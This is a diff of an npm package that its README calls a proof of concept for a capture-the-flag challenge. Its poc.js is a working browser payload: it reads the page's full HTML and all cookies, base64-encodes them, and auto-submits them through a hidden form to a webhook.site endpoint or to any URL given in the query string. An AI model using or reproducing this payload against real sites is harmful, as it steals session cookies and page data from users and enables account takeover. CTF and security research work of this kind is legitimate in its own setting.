@milymilo/ctf-poc-unpkg 1.0.5

package/README.md

@@ -0,0 +1,5 @@
+# DO NOT USE
+
+This package is a PoC code for a CTF challenge.
+
+It's nothing interesting, and shouldn't be uploaded anywhere.

package/package.json

@@ -0,0 +1,11 @@
+{
+  "name": "@milymilo/ctf-poc-unpkg",
+  "version": "1.0.5",
+  "description": "This package is a PoC code for a CTF challenge.",
+  "main": "poc.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC"
+}

package/poc.js

@@ -0,0 +1,38 @@
+const vForm = (action, method, fields) => {
+    const form = document.createElement('form')
+    form.setAttribute('hidden', 'true')
+    form.setAttribute('action', action)
+    form.setAttribute('method', method)
+
+    fields.forEach(field => {
+        const element = document.createElement('input')
+        element.setAttribute('type', field.type || 'text')
+        element.setAttribute('name', field.name || '')
+        element.setAttribute('value', field.value || '')
+        form.appendChild(element)
+    })
+
+    document.body.appendChild(form)
+    form.submit()
+}
+
+(async () => {
+    const params = new URLSearchParams(window.location.search);
+
+    const options = {
+        method: params.get("m") || "POST",
+        target: params.get("t") || "https://webhook.site/c1289a5d-3cd8-4178-9f11-678cc96f225a",
+    }
+
+    if (!options.target)
+        return
+
+    const data = btoa(JSON.stringify({
+        document: document.documentElement.innerHTML,
+        cookies: document.cookie
+    }));
+
+    vForm(options.target, options.method, [
+        { name: 'data', value: data },
+    ]);
+})()